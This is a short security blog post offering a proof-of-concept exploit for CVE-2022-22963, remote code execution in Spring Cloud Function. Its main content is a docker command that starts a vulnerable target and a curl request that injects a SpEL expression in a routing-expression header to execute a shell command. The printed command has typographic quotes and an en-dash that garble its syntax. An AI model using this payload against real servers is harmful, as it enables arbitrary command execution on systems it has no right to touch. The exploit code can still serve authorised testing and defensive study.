CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

CVE-2022-22963 is to run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example:

docker run -it -d -p 8080:8080 bobcheat/springboot-public

Exploit

Curl command:

curl -i -s -k -X $’POST’ -H $’Host: 192.168.1.2:8080′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\”touch /tmp/test”)’ –data-binary $’exploit_poc’ $’http://192.168.1.2:8080/functionRouter’

Or using Burp suite:

R K

Next CVE-2022-27254 : PoC For Vulnerability In Honda's Remote Keyless System »

Previous « Casper-Fs : A Custom Hidden Linux Kernel Module Generator

Leave a Comment

Share

Published by

R K

Tags: CVE-2022-22963Java Frameworkremote code execution

4 years ago

Recent Posts

TECH

The Evolution of Cloud Technology: Where We Started and Where We’re Headed

Image credit:pexels.com If you think back to the early days of personal computing, you probably…

18 hours ago

TECH

The Evolution of Online Finance Tools In a Tech-Driven World

In an era defined by technological innovation, the way people handle and understand money has…

18 hours ago

OSINT

A Complete Guide to Lenso.ai and Its Reverse Image Search Capabilities

The online world becomes more visually driven with every passing year. Images spread across websites,…

2 days ago

Cyber security

How Web Application Firewalls (WAFs) Work

General Working of a Web Application Firewall (WAF) A Web Application Firewall (WAF) acts as…

1 month ago

Linux

How to Send POST Requests Using curl in Linux

How to Send POST Requests Using curl in Linux If you work with APIs, servers,…

1 month ago

Linux

What Does chmod 777 Mean in Linux

If you are a Linux user, you have probably seen commands like chmod 777 while…

1 month ago

L